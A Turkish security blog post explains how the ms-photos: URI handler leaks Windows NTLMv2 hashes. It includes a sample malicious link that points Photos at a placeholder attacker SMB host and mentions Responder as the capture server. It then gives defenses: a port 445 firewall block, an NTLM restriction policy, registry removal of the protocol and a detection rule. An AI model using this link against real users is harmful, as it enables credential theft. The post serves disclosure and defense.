Microsoft Photos NTLM Sızıntısı (Zero-Day) Nasıl Yapılır ve Nasıl Engellenir?

Giriş: Bir “Özellik” Nasıl Silaha Dönüşür?

Microsoft’un “tasarım gereği” (by design) diyerek kapatmadığı ms-photos: zafiyeti, aslında Windows’un kimlik doğrulama mekanizmasının (SSO) kötüye kullanılmasıdır. Bu makalede, saldırganların bir linke tıklatarak şifre hash’inizi nasıl çaldığını adım adım inceleyecek ve sistem yöneticileri için “Kurşun Geçirmez” savunma stratejilerini paylaşacağız.

⚔️ Saldırı Anatomisi: Adım Adım Exploitation

Bu saldırı, Windows’un Otomatik Kimlik Doğrulama refleksine dayanır. Windows, bir UNC yoluna (\\Server\Share) erişmeye çalıştığında, karşı taraf (Sunucu) kimlik sorarsa, Windows otomatik olarak mevcut kullanıcının NTLMv2 bilgilerini pakeler ve sunucuya gönderir.

1. Aşama: Tuzak Kurma (The Setup)

Saldırgan, internet üzerinde kontrol ettiği bir sunucuda (VPS) sahte bir SMB servisi çalıştırır. Bunun için genellikle Responder veya özel Python scriptleri kullanılır. Bu sunucu, kendisine gelen her bağlantı isteğine “Kimsin sen?” (Challenge) diyerek yanıt verecek şekilde yapılandırılır.

2. Aşama: Yükün Hazırlanması (The Payload)

Saldırgan, Microsoft Photos uygulamasını tetikleyecek özel bir URI (Uniform Resource Identifier) hazırlar.

Zararlı Link Formatı:

ms-photos:viewer?fileName=\\SALDIRGAN_IP_ADRESI\sahte_klasör\tatil_fotografi.jpg

• ms-photos: Windows’a “Bu linki Fotoğraflar uygulamasıyla aç” emrini verir.

• viewer: Uygulamanın görüntüleyici modunu açar.

• fileName=\\…: Burası kritik noktadır. Uygulamaya yerel bir dosya yerine, saldırganın sunucusundaki (UNC Path) bir dosya yolunu gösterir.

3. Aşama: Tetikleme ve Sızıntı (The Handshake)

Kurban bu linke tıkladığında (veya bir web sitesi JavaScript ile bu linki arka planda tetiklediğinde) şu olaylar mili-saniyeler içinde gerçekleşir:

1. Photos.exe Başlar: Windows, linki işler ve Fotoğraflar uygulamasını açar.

2. Dosya İsteği: Uygulama, parametrede verilen \\SALDIRGAN_IP adresine SMB (Port 445) üzerinden bağlanmaya çalışır.

3. Negotiate (Pazarlık): Windows, saldırganın sunucusuna “Merhaba, ben SMB konuşmak istiyorum” der.

4. Challenge (Meydan Okuma): Saldırganın sunucusu, “Konuşabiliriz ama önce kimliğini kanıtla. İşte sana rastgele bir sayı (Nonce), bunu şifrele ve bana gönder” der.

5. Response (Sızıntı Anı): Windows, kullanıcının oturum açma parolasının özetini (Hash) kullanarak bu sayıyı şifreler ve NTLMv2 Response paketi olarak saldırgana gönderir.

6. Game Over: Saldırgan artık hash’e sahiptir. Bağlantıyı keser. Kullanıcı ekranında sadece “Görüntü yüklenemedi” hatası görür veya hiçbir şey görmez.

🛡️ Kapsamlı Savunma Rehberi: Kapıları Kilitleyin!

Microsoft yamayı reddettiği için, savunma hattını kendiniz kurmalısınız. İşte katmanlı güvenlik önlemleri:

1. Ağ Seviyesi: “Kill Switch” (Port 445)

En etkili ve kesin çözüm budur. Kurumsal ağınızdaki hiçbir istemci (Client), internetteki bir sunucuyla SMB (Dosya Paylaşımı) konuşmamalıdır.

• Firewall Kuralı: Donanım güvenlik duvarınızda (FortiGate, Palo Alto, vb.) LAN to WAN yönünde TCP Port 445 trafiğini tamamen BLOCK (Engelle) olarak ayarlayın.

• Neden? Bu port sadece iç ağda (LAN) veya VPN tünellerinde açık olmalıdır. İnternete açık olması, sadece bu saldırı için değil, WannaCry gibi fidye yazılımları için de risktir.

2. GPO ile NTLM Kısıtlaması (İşletim Sistemi Seviyesi)

Windows’un dışarıya NTLM hash göndermesini Group Policy ile yasaklayabilirsiniz. Bu ayar, Photos uygulaması dahil tüm uygulamaların hash sızdırmasını engeller.

• Yol: Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options

• Ayar: Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers

• Değer: Deny all (Hepsini Reddet) veya Audit all (Önce loglamak isterseniz).

• Uyarı: Bu ayarı yapmadan önce, meşru dış sunuculara (varsa) NTLM ile bağlanmadığınızdan emin olun. İstisnalar için “Add remote server exceptions” ayarını kullanabilirsiniz.

3. Registry ile “ms-photos” Protokolünü Öldürmek

Eğer kullanıcılarınızın Fotoğraflar uygulamasını linklerden açmasına ihtiyacı yoksa, bu protokolü tamamen silebilirsiniz.

PowerShell (Yönetici) Komutu:

# Mevcut kaydı yedekle
Reg export "HKCR\ms-photos" "C:\Backup_ms-photos.reg"

# Protokol ilişkilendirmesini sil
Remove-Item -Path "HKCR\ms-photos" -Recurse -Force

Bu işlemden sonra ms-photos: linkleri çalışmayacaktır.

4. Saldırı Tespiti (Detection)

EDR veya SIEM kullanıyorsanız, aşağıdaki kuralı oluşturarak saldırı denemelerini yakalayabilirsiniz.

Sysmon / SIEM Kural Mantığı:

• Process Name: Photos.exe

• Destination Port: 445

• Destination IP: NOT (Internal Subnets) (İç ağ IP’leri hariç, dışarıya giden bağlantılar)

Eğer Photos.exe internete 445 portundan gitmeye çalışıyorsa, %99 ihtimalle bir saldırı altındasınızdır.

🛠️ Teknik Özet